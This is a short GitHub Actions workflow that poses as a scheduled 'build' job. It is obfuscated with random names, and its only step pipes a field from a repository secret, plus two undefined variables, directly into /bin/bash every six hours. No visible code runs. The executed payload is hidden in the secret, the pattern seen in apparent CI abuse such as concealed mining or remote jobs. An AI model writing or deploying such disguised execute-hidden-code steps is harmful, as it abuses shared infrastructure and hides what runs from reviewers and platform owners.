name: zhouyiri2245

on:
  workflow_dispatch:
  schedule:
    - cron: '0 2/6 * * *'

jobs:
  build:
    runs-on: ubuntu-latest

    steps:
      - uses: actions/checkout@v4
      - name: zhouyiri2245
        env:
          kj126: ${{ secrets.kj126 }}
        run: |
          echo $kj126 | jq -r .o1941 | /bin/bash
          echo $aeqko3 | jq -r .phq17659 | /bin/bash
          echo $rvmy285 | jq -r .vpafa734 | /bin/bash

